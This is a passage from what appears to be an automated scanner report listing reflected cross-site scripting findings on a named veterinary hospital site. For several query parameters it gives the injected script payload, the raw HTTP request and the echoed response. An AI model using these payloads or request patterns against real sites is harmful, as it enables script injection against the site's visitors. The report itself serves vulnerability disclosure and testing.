Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:15:55 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=7lu4jl5rh2o7n9k5h17md6nq97; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=5398c"><script>alert(1)</script>87df2a8d4cb&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Ge
...[SNIP]...

2.23. http://www.vcahospitals.com/main/offer [date parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The value of the date request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5640a"><script>alert(1)</script>ae7e41b90f2 was submitted in the date parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=13070844005640a"><script>alert(1)</script>ae7e41b90f2&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:00 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=1ggd6ft9v06ns03acajkmsv7l1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=13070844005640a"><script>alert(1)</script>ae7e41b90f2&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&to
...[SNIP]...

2.24. http://www.vcahospitals.com/main/offer [email parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 301c8"><script>alert(1)</script>a34d170cc15 was submitted in the email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=301c8"><script>alert(1)</script>a34d170cc15&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:07 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=70e0blfdjoh05e8704s1uokj93; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=301c8"><script>alert(1)</script>a34d170cc15&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa1
...[SNIP]...

2.25. http://www.vcahospitals.com/main/offer [fname parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The value of the fname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c92a"><script>alert(1)</script>7d4cd1323ce was submitted in the fname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=6c92a"><script>alert(1)</script>7d4cd1323ce&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:14 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=v41mjjvjtb395bfee89ffekb73; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=6c92a"><script>alert(1)</script>7d4cd1323ce&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e17
...[SNIP]...

2.26. http://www.vcahospitals.com/main/offer [formtype parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The value of the formtype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d982d"><script>alert(1)</script>197f4942bd8 was submitted in the formtype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORPd982d"><script>alert(1)</script>197f4942bd8&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:20 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=koa2mkuvdq1cjng1duqsnnc194; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORPd982d"><script>alert(1)</script>197f4942bd8&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bc
...[SNIP]...

2.27. http://www.vcahospitals.com/main/offer [gclid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The value of the gclid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5d2e"><script>alert(1)</script>46361887d43 was submitted in the gclid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAwc5d2e"><script>alert(1)</script>46361887d43 HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:04:45 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=6h96hdei9ppruniesbkufjpql5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAwc5d2e"><script>alert(1)</script>46361887d43" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.28. http://www.vcahospitals.com/main/offer [guid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The value of the guid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1e65"><script>alert(1)</script>2aa17c446a7 was submitted in the guid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?&state=FL&guid=2505B0C6-B6AA-4144-878F-54873D353284e1e65"><script>alert(1)</script>2aa17c446a7 HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:09 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?&state=FL&guid=2505B0C6-B6AA-4144-878F-54873D353284e1e65"><script>alert(1)</script>2aa17c446a7" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.29. http://www.vcahospitals.com/main/offer [ipaddress parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
